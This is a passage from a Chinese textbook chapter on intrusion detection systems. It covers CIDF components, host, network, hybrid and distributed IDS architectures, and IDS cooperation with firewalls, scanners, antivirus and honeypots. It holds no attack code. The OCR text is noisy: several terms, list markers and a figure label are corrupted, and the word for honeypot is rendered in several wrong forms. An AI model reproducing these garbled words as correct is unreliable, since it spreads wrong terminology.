现 ， 而 事件 数据 库 则 以 文件 或 数据 流 的 形式 出 现 。GIDO 数据 流 可 以 是 发 生 在 系统 中 的 审 
计 事 件 或 对 审计 事件 的 分 析 结 果 。 
事件 产生 器 的 任务 是 从 入 侵 检测 系统 之 外 的 计算 机 中 收集 事件 ， 但 不 作 分 析 ， 将 这 些 
事件 转换 成 CIDF 的 GIDO 格式 传送 给 其 他 组 件 ; 事件 分 析 器 分 析 收 到 的 GIDO， 并 将 产 
生 的 新 的 GIDO 再 传送 给 其 他 组 件 ， 事 件数 据 库 用 来 存储 GIDO， 以 备 系统 使 用 ， 响 应 单 
元 处 理 收 到 的 GIDO， 并 根据 处 理 结果 采取 相应 的 措施 ， 如 删除 相关 进程 、 将 连接 复位 以 
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及 修改 文件 权限 等 。 
7.4.2 入侵 检 测 体系 结构 


根据 入 侵 检测 系统 的 保护 对 象 或 数据 来 源 ， 可 以 将 入 侵 检 测 技术 分 为 主机 入 侵 检测 技 
术 和 网 络 入 侵 检 测 技术 两 种 。 作 为 这 两 类 技术 的 实施 体系 ， 主 机 入 侵 检测 系统 和 网 络 入 侵 
检测 系统 是 两 类 基本 的 入 侵 检测 体系 ， 混 合 入 侵 检测 系统 和 分 布 式 入 侵 检测 系统 则 是 在 此 
基础 上 的 延伸 。 


1. 主机 入 侵 检测 


基于 主机 的 入 侵 检 测 出 现在 20 世纪 80 年 代 初 期 ， 那 时 网 络 还 没有 像 今 天 这 样 普遍 、 
复杂 ， 且 网 络 之 间 也 没有 完全 连通 。 在 这 较为 简单 的 环境 里 ， 检 查 可 疑 行为 的 检验 记录 是 
很 常见 的 操作 。 由 于 入 侵 在 当时 是 相当 少见 的 ， 因 此 对 攻击 进行 事后 分 析 就 可 以 防止 以 后 
的 攻击 。 主 机 入 侵 检测 系统 确切 的 定义 就 是 ， 安 装 在 单个 主机 或 服务 器 系统 上 ， 监 测 和 响 
应 主机 或 服务 器 系统 的 入 侵 行为 ， 并 对 主机 系统 进行 全 面 保护 的 系统 。 

主机 入 侵 检测 系统 主要 是 对 该 主机 的 网 络 连 接 行为 ， 以 及 系统 审计 日 志 进行 智能 分 析 
和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 ， 入 侵 检测 系统 就 会 采取 相应 措施 。 作 为 对 主机 系统 
的 全 面 防护 ， 主 机 入 侵 检测 通常 包括 网 络 监控 和 主机 监控 两 个 方面 。 

主机 入 侵 检测 系统 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 
侵 检测 的 一 个 常用 方法 ， 是 通过 定期 检测 和 校 验 进行 的 ， 以 便 发 现 意外 的 变化 。 反 应 的 快 
慢 与 轮 询 的 频率 有 直接 的 关系 。 最 后 ， 许 多 产品 都 是 监听 端口 的 活动 ， 并 在 特定 端口 被 访 
问 时 向 管理 员 报警 。 这 类 检测 方法 将 基于 网 络 的 入 侵 检测 基本 方法 融入 基于 主机 的 检测 环 
境 中 。 尽 管 后 者 不 如 前 者 快捷 ， 但 却 有 前 者 无 法 比拟 的 优点 。 

(1) 性 能 价格 比 高 。 在 主机 数量 较 少 的 情况 下 ， 这 种 方法 的 性 能 价格 比较 高 。 尽 管 基 
于 网 络 的 入 侵 检测 系统 能 很 容易 地 提供 广泛 覆盖 ， 但 其 价格 通常 很 高 ， 而 基于 主机 的 入 侵 
检测 系统 花 销 较 小 ， 客 户 只 需 很 少 的 费用 用 于 最 初 的 安装 。 

(2) 细致 性 。 基 于 主机 的 入 侵 检测 系统 能 够 监视 用 户 和 文件 访问 活动 ， 包 括 文件 访 
问 、 改 变 文件 权限 、 试 图 建立 新 的 可 执行 文件 并 且 试 图 访问 特许 服务 等 。 例 如 ， 基 于 主机 
的 入 侵 检测 系统 可 以 监督 所 有 用 户 登录 及 退出 登录 的 情况 ， 以 及 每 个 用 户 在 连接 到 网 络 以 
后 的 行为 。 此 外 ， 基 于 主机 技术 还 可 监视 通常 只 有 管理 员 才 能 实施 的 非 正 常 行为 ， 并 且 能 
够 记录 所 有 用 户 账号 的 添加 、 删 除 及 更 改 的 情况 。 

(3) 针对 性 。 一 旦 入 侵 者 得 到 了 一 个 主机 的 用 户 名 和 口令 ， 基 于 主机 的 入 侵 监测 系统 
最 有 可 能 区 分 正常 的 活动 和 非法 的 活动 。 

(4) 易于 删除 。 每 一 个 主机 有 自己 的 代理 ， 用 户 删除 更 方便 。 

(5) 无 需 专门 硬件 。 基 于 主机 的 方法 有 时 不 需要 增加 专门 的 硬件 平台 。 基 于 主机 的 入 
侵 检 测 系统 存在 于 现 有 的 网 络 结构 之 中 ， 包 括 文件 服务 器 、Web 服务 器 及 其 他 共享 资源 ， 
因此 ， 基 于 主机 的 系统 效率 很 高 。 

(6) 对 网 络 流量 不 敏感 。 用 代理 的 方式 一 般 不 会 因为 网 络 流量 的 增加 而 放弃 对 网 络 行 
为 的 监视 。 
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(7) 适用 于 被 加 密 的 以 及 切换 的 环境 。 由 于 基于 主机 的 系统 安装 在 遍布 企业 的 各 种 主 
机 上 ， 因 此 它们 比 基 于 网 络 的 入 侵 检 测 系统 更 加 加 密 的 环境 。 交 换 设备 可 将 大 型 网 络 分 成 
许多 小 型 网 络 段 加 以 管理 ， 所 以 从 覆盖 足够 大 的 网 络 范围 的 角度 出 发 ， 很 难 确定 配置 基于 
网 络 的 入 侵 检测 系统 的 最 佳 位 置 。 基 于 主机 的 入 侵 检 测 系统 可 安装 在 所 需 的 重要 主机 上 ， 
在 交换 的 环境 中 具有 更 高 的 能 见 度 。 

根据 加 密 方式 在 协议 堆栈 中 的 位 置 不 同 ， 基 于 网 络 的 系统 可 能 对 某 些 攻击 没有 反 
基于 主机 的 入 侵 检测 系统 没有 这 方面 的 限制 。 

(8) 确定 攻击 是 否 成 功 。 由 于 基于 主机 的 入 侵 检测 系统 使 用 已 发 生 事件 的 信息 ， 因 此 
比 基 于 网 络 的 入 侵 检测 系统 更 能 准确 地 判断 攻击 是 否 成 功 。 


2. 网 络 入 侵 检测 


网 络 入 侵 检测 使 用 原始 网 络 包 作为 数据 源 ， 它 通常 利用 一 个 运行 在 混杂 模式 下 的 网 络 
适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 业务 ， 其 攻击 识别 模块 通常 使 用 4 种 常用 技 
术 来 识别 攻击 标志 ， 即 模式 、 表 达 式 或 字 节 匹配 、 频 率 或 穿越 闵 值 、 次 要 事件 的 相关 性 和 
非常 规 现象 检测 等 。 

一 旦 检测 到 了 攻击 行为 ， 入 侵 检测 系统 的 响应 模块 就 提供 多 种 选项 以 通知 、 报 警 ， 并 对 
攻击 采取 相应 的 反应 。 反 应 因 产品 而 异 ， 但 通常 都 包括 通知 管理 员 、 中 断 连接 并 且 做 会 话 记 
录 等 。 实 际 上 ， 许 多 客户 在 最 初 使 用 入 侵 检测 系统 时 ， 都 配置 了 基于 网 络 的 入 侵 检测 。 

1) 基于 网 络 的 入 侵 检测 系统 的 优点 

(1) 检测 速度 快 。 基 于 网 络 的 监测 器 通常 能 在 微 秒 或 秒 级 时 间 内 发 现 问题 ， 而 大 多 数 
基于 主机 的 产品 则 要 依靠 对 最 近 几 分 钟 内 审计 记录 的 分 析 才 能 得 出 结果 。 

(2) 隐蔽 性 好 。 网 络 上 的 监测 器 不 像 主机 那样 显眼 和 易 被 在 取 ， 因 而 也 不 容易 遭受 攻 
Ff。 基于 网 络 的 监视 器 不 运行 其 他 的 应 用 程序 ， 不 提供 网 络 服 务 ， 可 以 不 响应 其 他 计算 
机 ， 因 此 比较 安全 。 

(3) 视野 更 宽 。 基 于 网 络 的 入 侵 检测 可 以 在 网 络 的 边缘 上 ( 即 攻击 者 还 没 能 接 入 网 络 时 ) 
就 被 发 现 并 制止。 

(4) 较 少 的 监测 器 。 由 于 使 用 一 个 监测 器 就 可 以 保护 一 个 共享 的 网 段 ， 所 以 不 需要 很 
多 的 监测 器 。 相 反 ， 如 果 基 于 主机 ， 则 在 每 个 主机 上 都 需要 一 个 代理 ， 成 本 很 高 且 难 以 管理 。 
(5) 攻 击 者 不 易 转 移 证 据 。 基 于 网 络 的 入 侵 检测 系统 使 用 正在 发 生 的 网 络 通信 进行 实时 
攻击 的 检测 ， 所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ， 而 且 还 包括 
可 识别 黑客 身份 和 对 其 进行 起 诉 的 信息 。 许 多 黑客 都 熟知 审计 记录 ， 他 们 知道 如 何 操纵 这 
些 文件 来 掩盖 作案 痕迹 。 

(6) 操作 系统 无 关 性 。 基 于 网 络 的 入 侵 检 测 系统 作为 安全 监测 资源 ， 与 主机 的 操作 系 
统 无 关 。 与 之 相 比 ， 基 于 主机 的 系统 必须 在 特定 的 、 没 有 遭 到 破坏 的 操作 系统 中 才能 正常 
工作 。 

(7) 占用 资源 少 。 在 被 保护 的 设备 上 不 用 占用 任何 资源 。 

2) 网 络 入 侵 检 测 系统 存在 的 弱点 

(1) 网 络 入 侵 检测 系统 只 检测 直接 连接 到 的 网 段 通信 ， 不 能 检测 不 同 网 段 的 网 络 包 。 

(2) 在 使 用 交换 以 太 网 的 环境 中 会 出 现 检测 范围 受 限 。 


时 
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G) 安装 多 台 网 络 入 侵 检测 系统 的 传感器 会 使 部 署 整个 系统 的 成 本 大 大 增加 。 

(4) 网 络 入 侵 检测 系统 为 了 优化 性 能 通常 采用 特征 检测 的 方法 ， 可 以 检测 出 普通 的 攻 
击 ， 但 很 难 实现 一 些 复杂 的 、 需 要 大 量 计算 与 分 析 时 间 的 攻击 检测 。 

(5) 网 络 入 侵 检测 系统 会 将 大 量 的 数据 传 回 分 析 系 统 中 ， 在 监听 特定 的 数据 包 时 会 产 
生 大 量 的 分 析 数据 流量 。 因 而 传感器 协同 工作 能 力 较 能 。 

(@ 网 络 入 侵 检测 系统 处 理 加 密 的 会 话 过 程 比较 困难 ， 目 前 ， 通 过 加 密 通道 的 攻击 沿 
不 多 ， 但 随 着 IPv6 的 普及 ， 这 个 问题 会 越 来 越 突出 。 

3. 混合 入 侵 检测 

主机 入 侵 检测 系统 和 网 络 入 侵 检测 系统 各 有 自己 的 优 、 缺点， 混合 使 用 基于 主机 和 基 
于 网 络 这 两 种 方式 能 够 达到 更 好 的 检测 效果 。 例 如 ， 主 机 入 侵 检测 系统 使 用 系统 日 志 作为 
检测 依据 ， 在 确定 攻击 是 否 已 经 取得 成 功 时 与 网 络 入 侵 检测 系统 相 比 具 有 更 大 的 准确 性 ， 
因此 主机 入 侵 检测 系统 对 网 络 入 侵 检测 系统 是 一 个 很 好 的 补充 ， 人 们 完全 可 以 使 用 网 络 入 
侵 检测 系统 提供 早期 报警 ， 而 使 用 主机 入 侵 检 测 系统 来 验证 攻击 是 否 取得 成 功 。 这 实际 上 
就 是 混合 入 侵 检测 系统 的 概念 。 


4. 分 布 式 入 侵 检测 


分 布 式 入 侵 检测 系统 可 以 是 混合 入 侵 检测 系统 的 一 种 ， 也 可 以 仅仅 是 网 络 入 侵 检测 系 
统 的 分 布 式 整合 。 

传统 的 集中 式 入 侵 检测 技术 的 基本 原理 是 在 网 络 的 不 同 网 段 中 放置 多 个 传感器 或 探测 
器 ， 首 先 收集 当前 网 络 状 态 的 信息 ， 然 后 将 这 些 信 息 传 送 到 中 央 控 制 台 进行 处 理 和 分 析 。 
更 进一步 ， 有 的 传感器 具有 某 种 主动 性 ， 能 够 接收 中 央 控 制 台 的 某 些 命令 和 下 载 某 些 识别 
模板 。 

集中 式 模型 具有 以 下 几 个 明显 的 缺陷 。 

(1) 面 对 在 大 规模 、 异 构 网 络 基础 上 发 起 的 复杂 攻击 行为 ， 会 增加 中 央 控 制 台 的 工作 
负荷 ， 以 至 于 它 无 法 具有 足够 能 力 处 理 来 自 四 面 八方 的 消息 事件 。 因 此 ， 会 遗漏 许多 重大 
消息 事件 ， 从 而 增加 漏 警 率 。 

(2) 由 于 网 络 传输 的 延 时 间 题 ， 到 达 中 央 控 制 台 的 数据 包 中 的 事件 消息 只 是 反映 了 其 
刚 被 生成 时 的 情况 ， 而 不 能 反映 随 着 时 间 而 改变 的 当前 状态 。 这 使 得 基于 过 时 信息 做 出 的 
判断 的 可 信 度 大 大 降低 ， 同 时 也 使 得 确认 相关 信息 的 来 源 变 得 非常 困难 。 

(3) 异 构 网 络 环 境 所 带 来 的 平台 差异 也 给 集中 式 模型 带 来 诸多 困难 。 因 为 每 一 种 攻击 
行为 在 不 同 的 操作 环境 中 都 表现 出 不 同类 型 的 模式 特征 ， 而 已 知 的 攻击 方法 数目 非常 多 ， 
因而 在 集中 式 模型 的 系统 中 ， 想 要 与 攻击 模式 完全 匹配 就 已 经 非常 困难 ， 更 何况 还 要 应 付 
不 断 出 现 的 新 型 攻击 手段 。 

胡 对 诸多 难题 ， 很 多 新 的 思路 已 经 出 现 ， 其 中 一 种 就 是 攻击 策略 分 析 (Attack Strategy 
Analysis) 方 法 。 它 采用 分 布 式 智能 代理 的 结构 方式 ， 由 几 个 中 央 智 能 代理 和 大 量 分 布 的 本 
地 代理 组 成 ， 其 中 本 地 代理 负责 处 理 本 地 事件 ， 而 中 央 代 理 负 责 整 体 的 分 析 工 作 。 与 集中 
式 模型 不 同 的 是 ， 攻 击 策略 分 析 强 调 的 是 通过 全 体 智能 代理 协同 工作 来 分 析 入 侵 者 的 攻击 
策略 ， 中 央 代 理 扮演 的 是 协调 者 和 全 局 分 析 员 的 角色 ， 但 绝 不 是 唯一 的 事件 处 理 者 ， 本 地 
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代理 有 较 强 的 自主 性 ， 可 以 独立 地 对 本 地 攻击 进行 有 效 检测 ， 同 时 也 与 中 央 智 能 代理 和 其 
他 本 地 代理 通信 ， 接 受 中 央 智 能 代理 的 调度 指挥 ， 并 与 其 他 代理 协同 工作 。 这 种 方法 有 明 
显 的 优点 ， 但 同时 又 带 来 了 其 他 的 一 些 问 题 ， 如 大 量 代理 的 组 织 和 协作 问题 、 相 互 之 间 的 
通信 、 处 理 能 力 和 任务 的 分 配 等 。 

下 面 介绍 一 个 典型 的 分 布 式 入 侵 检测 系统 的 解决 方案 。 

图 7.5 所 示 的 入 侵 检 测 系统 是 一 种 基于 部 件 的 分 布 式 入 侵 检测 系统 。 系 统 中 的 部 件 是 
具有 特定 功能 的 独立 的 应 用 程序 、 小 型 的 系统 或 者 仅仅 是 一 个 非 独立 的 应 用 程序 的 功能 
块 。 在 部 署 时 ， 这 些 部 件 可 能 在 同一 台 计 算 机 上 ， 也 可 能 各 自分 布 在 一 个 大 型 网 络 的 不 同 
地 点 ， 每 个 部 件 都 能 够 完成 某 一 特定 的 功能 。 各 个 部 件 之 间 通 过 统一 的 网 络 接口 进行 信息 
交换 ， 这 样 既 简 化 了 数据 交换 的 复杂 性 ， 使 得 多 个 部 件 能 够 很 容易 地 分 布 在 不 同 主机 上 ， 
也 给 系统 提供 了 一 个 扩展 接口 。 
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7.5 ”分布 式 入 侵 检测 系统 框图 


系统 主要 部 件 有 网 络 引擎 (Network Engine)、 主 机 代理 (Host Agent)、 存 储 系统 (Storage 
System) 、 分 析 系 统 (Analyzer System) 、 响 应 系统 (Response System) 和 控制 台 (Manager 
Console)。 

(1) 网 络 引擎 和 主机 代理 属于 CIDF 中 的 事件 产生 器 (Event Generators)。 网 络 引擎 截获 
网 络 中 的 原始 数据 包 ， 并 从 中 寻找 可 能 的 入 侵 信息 或 其 他 敏感 信息 。 主 机 代理 从 所 在 主机 
内 收集 信息 ， 包 括 分 析 日 志 、 监 视 用 户 行为 、 分 析 系统 调用 、 分 析 该 主机 的 网 络 通信 等 。 
网 络 引擎 和 主机 代理 也 具有 数据 分 析 功 能 ， 对 于 已 知 的 攻击 ， 在 这 些 部 件 中 使 用 模式 匹配 
的 方法 来 检测 ， 可 以 大 大 提高 系统 的 处 理 速度 ， 也 可 以 减少 分 析 部 件 的 工作 量 及 系统 网 络 
传输 的 影响 。 

(2) 存储 系统 用 来 存储 事件 产生 器 捕获 的 原始 数据 、 分 析 结果 等 ， 储 存 的 原始 数据 用 
于 对 入 侵 者 进行 法 律 制裁 时 提供 确凿 的 证 据 。 存 储 系统 也 是 不 同 部 件 之 间 数 据 处 理 的 共享 
数据 库 ， 为 系统 不 同 部 件 提 供 各 自 感 兴趣 的 数据 。 因 此 ， 存 储 系统 应 该 提供 灵活 的 数据 维 
护 、 处 理 和 查询 服务 ， 同 时 也 必须 是 一 个 安全 的 日 志 系统 。 

(3) 分 析 系 统 能 够 对 事件 发 生 器 捕获 的 原始 信息 、 其 他 入 侵 检测 系统 提供 的 可 疑 信息 
进行 统一 分 析 和 处 理 。 分 析 系 统 采用 高 层次 的 分 析 方 法 ， 如 基于 统计 的 分 析 方 法 、 基 于 神 
经 网 络 的 分 析 方 法 等 ， 负 责 分 布 式 攻击 检测 。 

(4) 分 析 系 统 是 整个 入 侵 检 测 系 统 的 大 脑 ， 分 析 方 法 则 是 该 系统 的 思维 能 力 。 各 种 分 
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析 方 法 都 有 各 自 的 优势 和 不 足 ， 因 此 ， 系 统 中 分 析 方法 应 该 是 可 以 动态 更 换 的 ， 并 且 多 种 
算法 可 以 并 存 。 

(5) 响应 系统 用 于 对 确认 的 入 侵 行为 采取 相应 措施 。 响 应 包括 消极 的 措施 ， 如 给 管理 
员 发 E-mail、 消 息 、 传 呼 等 ， 也 可 以 采取 保护 性 措施 ， 如 切断 入 侵 者 的 TCP 连接 、 修 改 路 
由 器 的 访问 控制 策略 等 ， 还 可 以 采取 主动 的 反击 策略 ， 如 对 攻击 者 进行 DDoS 攻击 等 ， 但 
这 种 以 毒 攻 毒 的 方法 在 法 律 上 是 不 许可 的 。 

(6) 控制 台 是 整个 入 侵 检测 系统 和 用 户 交 互 的 界面 。 用 户 可 以 提供 控制 台 配 置 系统 中 
的 各 个 部 件 ， 也 可 通过 控制 台 了 解 各 部 件 的 运行 情况 。 


7.5 ”入侵 检测 系统 与 协同 


由 入 侵 检测 系统 的 基本 构成 可 以 看 出 ， 典 型 的 入 侵 检测 系统 模型 包括 以 下 3 个 功能 
部 件 。 

Q@ 提供 事件 记录 流 的 信息 源 。 

@ 发 现 入 侵 迹 象 的 分 析 引 擎 。 

@ 基于 分 析 引 擎 的 分 析 结 果 产 生 反应 的 响应 部 件 。 

目前 的 入 侵 检 测 系统 是 网 络 安全 整体 解决 方案 的 一 个 重要 部 分 ， 需 要 与 其 他 安全 设备 
之 间 协 同 工 作 ， 共 同 解决 网 络 安全 问题 ， 这 就 对 引入 协同 提出 了 要 求 。 


7.5.1 数据 采集 协同 


入 侵 检测 需要 采集 动态 数据 (网 络 数据 包 ) 和 静态 数据 (日 志文 件 等 )。 基 于 网 络 的 入 侵 检 
测 系统 ， 仅 在 网 络 层 通过 原始 的 他 包 进行 检测 ， 已 不 能 满足 日 益 增长 的 安全 需求 ， 基 于 主 
机 的 入 侵 检测 系统 ， 通 过 直接 查看 用 户 行为 和 操作 系统 日 志 数据 来 寻找 入 侵 ， 却 很 难 发 现 
来 自 底层 的 网 络 攻击 。 

目前 的 入 侵 检 测 系统 将 网 络 数据 包 的 采集 、 日 志文 件 的 采集 与 信息 分 析 割 裂 开 来 ， 即 
使 是 综合 基于 网 络 和 基于 主机 的 入 侵 检 测 系统 也 不 例外 ， 没 有 在 这 两 类 原始 数据 的 相关 性 
上 作 考虑 。 此 外 ， 在 采集 网 络 数据 包 时 ， 入 侵 检测 系统 一 直 是 通过 嗅 探 等 被 动 方式 来 获取 
数据 ， 一 旦 某 个 数据 包 丢 失 就 无 法 挽回 。 而 且 ， 未 来 的 网 络 是 全 交换 的 网 络 ， 网 络 速度 越 
来 越 快 ， 许 多 重要 的 网 络 还 是 加 密 的 。 在 这 种 情况 下 ， 对 动态 网 络 数据 包 的 采集 就 更 加 困 
难 。 因 此 ， 在 数据 采集 上 进行 协同 并 充分 利用 各 层次 的 数据 ， 是 提高 入 侵 检 测 能 力 的 首要 
条 件 。 

数据 采集 协同 包含 以 下 几 个 方面 的 内 容 。 

(1) 入 侵 检测 系统 与 漏洞 扫描 系统 的 协同 。 漏 洞 扫描 系统 的 特点 是 利用 完整 的 漏洞 
库 ， 对 网 络 中 的 各 个 主机 进行 扫描 ， 对 主机 所 存在 的 网 络 、 操 作 系统 和 运行 等 方面 存在 的 
漏洞 给 出 综合 报告 ， 然 后 提出 漏洞 的 修补 办 法 和 风险 评估 报告 。 

(2) 入 侵 检测 系统 与 扫描 系统 的 协同 。 一 方面 ， 可 以 利用 扫描 系统 的 扫描 结果 ， 对 目 
前 网 络 或 系统 所 存在 的 漏洞 做 到 心中 有 数 ， 并 对 预警 策略 进行 修改 ， 从 而 尽 可 能 地 减少 误 
报 ， 并 对 隐 含 在 正常 行为 中 的 攻击 行为 做 出 报警 ， 另 一 方面 ， 入 侵 检测 系统 能 够 对 目前 正 
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在 遭受 攻击 的 漏洞 进行 及 时 的 防范 。 此 外 ， 漏 洞 扫 描 系统 也 可 以 利用 入 侵 检 测 系统 的 报警 
信息 ， 扫 描 主 机 的 特定 漏洞 ， 查 看 正在 受 攻击 的 漏洞 是 否 真实 存在 ， 如 果真 实 存在 ， 做 出 
必须 及 时 封 堵 的 报告 。 

(3) 入 侵 检测 系统 与 防 病毒 系统 的 协同 。 面 对 来 自 网 络 的 病毒 攻击 ， 入 侵 检测 系统 可 
能 根据 某 些 特征 做 出 警告 ， 但 由 于 入 侵 检测 系统 本 身 并 不 是 防 病毒 系统 ， 对 网 络 中 的 主机 
是 否 真 的 正在 遭受 计算 机 病毒 的 袭击 不 能 准确 地 预报 ， 这 时 防 病毒 系统 就 有 了 用 武之 地 ， 
可 以 有 针对 性 地 对 入 侵 检测 系统 的 病毒 报警 信息 进行 验证 ， 对 遭受 病毒 攻击 的 主机 系统 进 
行 适当 的 处 理 。 


7.5.2 ”数据 分 析 协 同 


入 侵 检测 不 仅 需 要 利用 模式 匹配 和 异常 检测 技术 来 分 析 某 个 检测 引擎 所 采集 的 数据 ， 
还 要 在 此 基础 上 利用 数据 挖掘 技术 ， 分 析 多 个 检测 引擎 提交 的 审计 数据 以 发 现 更 为 复杂 的 
入 侵 行为 。 

从 理论 上 讲 ， 任 何 网 络 入 侵 行 为 都 能 够 被 发 现 ， 因 为 网 络 流量 和 主机 日 志 记录 了 入侵 
的 活动 。 数 据 分 析 协 同 需要 在 两 个 层面 上 进行 ， 一 是 对 一 个 检测 引擎 采集 的 数据 进行 协同 
分 析 ， 综 合 使 用 检测 技术 ， 以 发 现 较为 常见 的 、 典 型 的 攻击 行为 ; 二 是 对 来 自 多 个 检测 
引擎 的 审计 数据 ， 利 用 数据 挖掘 技术 进行 分 析 ， 以 发 现 较为 复杂 的 攻击 行为 。 考 核 入 侵 检 
测 系统 数据 分 析 能 力 可 以 从 准确 性 、 效 率 和 可 用 性 3 个 方面 进行 。 基 于 这 一 点 ， 可 以 认为 
监测 引擎 是 完成 第 一 种 数据 分 析 协 同 的 最 佳 地 点 ， 中 心 管理 控制 平台 则 是 完成 第 二 种 数据 
分 析 协 同 的 最 佳 地 点 。 

当 检 测 引擎 面 对 并 非 单一 的 数据 时 ， 综 合 使 用 各 种 监测 技术 就 显得 十 分 重要 。 从 攻击 
的 特征 来 看 ， 有 的 攻击 方法 使 用 异常 监测 来 检测 会 很 容易 ， 而 有 的 攻击 方法 使 用 模式 匹配 
来 检测 则 很 简单 。 因 此 ， 对 检测 引擎 的 设计 者 来 说 ， 首 先 需要 确定 监测 策略 ， 明 确 哪些 攻 
击 行为 属于 异常 检测 的 范畴 ， 哪 些 攻击 属于 模式 匹配 的 范畴 。 中 心 管理 控制 平台 执行 的 是 
更 为 高 级 的 、 复 杂 的 入 侵 检 测 ， 它 面 对 的 是 来 自 多 个 检测 引擎 的 审计 数据 ， 并 可 就 各 个 区 
域内 的 网 络 活动 情况 进行 “相关 性 ”分 析 ， 其 结果 为 下 一 时 间 段 及 检测 引擎 的 检测 活动 提 
供 支 持 。 例 如 ， 黑 客 在 正式 攻击 网 络 之 前 ， 往 往 利用 各 种 探测 器 分 析 网 络 中 最 脆弱 的 主机 
及 主机 上 最 容易 被 攻击 的 漏洞 ， 在 正式 攻击 时 ， 因 为 黑客 的 “攻击 准备 ”活动 早已 被 系统 
记录 ， 所 以 入 侵 检测 系统 就 能 及 时 地 对 此 攻击 活动 做 出 判断 。 

传统 的 数据 挖掘 技术 的 监测 模型 是 离线 产生 的 ， 这 是 因为 传统 数据 挖掘 技术 的 学 习 算 
法 必须 要 处 理 大 量 的 审计 数据 ， 十 分 耗 时 。 但 是 ， 有 效 的 入 侵 检 测 系统 必须 是 实时 的 ， 而 
且 基于 数据 挖掘 的 入 侵 检 测 系统 仅仅 在 监测 率 方面 高 于 传统 方法 的 监测 率 是 不 够 的 ， 只 有 
误 报 率 也 在 一 个 可 接受 的 范围 内 时 才 是 可 用 的 。 

美国 哥伦比亚 大 学 提出 了 一 种 基于 数据 挖掘 的 实时 入 侵 检测 技术 ， 证 明了 数据 挖掘 技 
术 能 够 用 于 实时 的 入 侵 检测 系统 。 基 本 框架 是 ， 首 先 从 审计 数据 中 提取 特征 ， 以 帮助 区 分 
正常 数据 和 攻击 行为 ， 然 后 将 这 些 特征 用 于 模式 匹配 或 异常 检测 模型 ， 接 着 描述 一 种 人 工 
异常 产生 方法 ， 来 降低 异常 检测 算法 的 误 报 率 ， 最 后 提供 一 种 结合 模式 匹配 和 异常 检测 模 
型 的 方法 。 实 验 表 明 ， 上 述 方法 能 够 提高 系统 的 监测 率 ， 而 不 会 降低 任何 一 种 检测 模型 的 
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性 能 。 在 此 技术 基础 上 ， 实 现 了 数据 挖掘 的 实时 入 侵 检测 系统 是 由 引擎 、 监 测 器 、 数 据 仓 
库 和 模型 产生 4 部 分 构成 ， 如 图 7.6 所 示 。 


格式 化 数据 


筑 炎 尖 汤 


监测 器 


图 7.6 基于 数据 挖掘 的 入 侵 检测 系统 体系 结构 


在 图 7.6 中 ， 引 擎 观察 原始 数据 并 计算 用 于 模型 评估 的 特征 ; 监测 器 获取 引擎 的 数据 
利用 监测 模型 来 评估 其 是 否 是 一 个 攻击 ， 数 据 仓库 被 用 作 数 据 和 模型 的 中 心 存储 地 ， 模 
型 产生 的 主要 目的 是 为 了 加 快 开发 及 分 发 新 的 入 侵 检测 模型 的 速度 。 


7.5.3 ”响应 协同 


响应 协同 就 是 入 侵 检 测 系统 与 有 充分 响应 能 力 的 网 络 设 备 或 网 络 安 全 设备 集成 在 一 
起 ， 构 成 响应 和 预警 互补 的 综合 安全 系统 。 
响应 协同 主要 包含 以 下 几 个 方面 。 


1. 入 侵 检测 系统 与 防火 墙 的 协同 


防火 墙 与 入 侵 检 测 系统 可 以 互补 体现 在 静态 和 动态 两 个 层面 上 。 静 态 协 同 是 指 入 侵 检 
测 系统 可 以 通过 了 解 防火 墙 的 策略 ， 对 网 络 安全 事件 进行 有 效 分 析 ， 从 而 准确 地 报警 ， 减 
少 误 报 ; 动态 协同 是 指 当 入 侵 检 测 系统 发 现 攻击 行为 时 ， 可 以 通知 防火 墙 阻 断 已 经 建立 的 
连接 ， 同 时 通知 防火 墙 修改 策略 ， 防 止 潜在 的 进一步 攻击 的 可 能 性 。 

2. 入 侵 检测 系统 与 路 由 器 、 交 换 机 的 协同 


交换 机 和 路 由 器 一 般 串 接 在 网 络 上 ， 都 有 预定 的 策略 ， 可 以 决定 网 络 上 的 数据 流 ， 所 
以 入 侵 检测 系统 与 交换 机 、 路 由 器 的 协同 也 有 动态 和 静态 两 个 方面 ， 过 程 也 大 致 相同 ， 这 
里 不 再 详 述 。 

3. 入 侵 检测 系统 与 防 病毒 系统 的 协同 

对 防 病毒 系统 来 讲 ， 查 毒 和 杀毒 缺 一 不 可 ， 在 查 毒 层面 有 数据 采集 协同 ， 在 杀毒 层 
有 响应 协同 。 入 侵 检 测 系统 可 以 通过 发 送 大 量 RST 报 文 阻 断 已 经 建立 的 连接 ， 但 在 防止 计 
算 机 遭受 病毒 袭击 的 方面 无 能 为 力 。 目 前 由 于 网 络 病毒 攻击 占 所 有 攻击 的 比例 不 断 增 加 
入 侵 检测 系统 与 防 病毒 系统 的 协同 也 变 得 越 来 越 重要 。 

4. 入 侵 检测 系统 与 宣 钠 和 填充 单元 系统 协同 


蜜 色 是 试图 将 攻击 者 从 关键 系统 引诱 开 的 诱骗 系统 。 这 些 系统 充满 了 看 起 来 很 有 用 的 
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信息 ， 但 是 这 些 信息 实 际 上 是 捍 造 的 ， 合 法 用 户 是 访问 不 到 的 。 因 此 ， 当 监测 到 对 “ 蜜 
铅 ” 的 访问 时 ， 很 可 能 就 有 攻击 者 问 入 。“ 蜜 炙 ” 上 的 监控 器 和 事件 日 志 器 监测 这 些 未 经 
授权 的 访问 ， 并 收集 攻击 者 活动 的 相关 信息 。 

利用 “ 蜜 钠 ”的 这 种 能 力 ， 一 方面 可 以 为 入 侵 检测 系统 提供 附加 数据 ， 另 一 方面 ， 当 
入 侵 检测 系统 发 现 有 攻击 者 时 ， 可 以 把 攻击 者 引入 “ 蜜 缸 ”， 防 止 攻击 者 造成 危害 ， 并 收 
集 攻击 者 的 信息 。 

“填充 单元 ”采取 另 一 种 不 同 的 方法 。“ 填 充 单元 ”不 是 试图 用 引诱 性 的 数据 吸引 攻 
击 者 ， 而 是 等 待 传统 的 入 侵 检测 系统 来 监测 攻击 者 ， 攻 击 者 被 传递 到 一 个 特定 的 填充 单元 
主机 ， 并 处 于 一 个 模拟 环境 中 ， 因 此 不 会 造成 任何 伤害 。 与 “ 蜜 钠 ” 相 似 ， 这 种 模拟 环境 
会 充满 使 人 感 兴趣 的 数据 ， 从 而 会 使 攻击 者 相信 攻击 正 按 计划 进行 。“ 填 充 单元 ”为 监测 
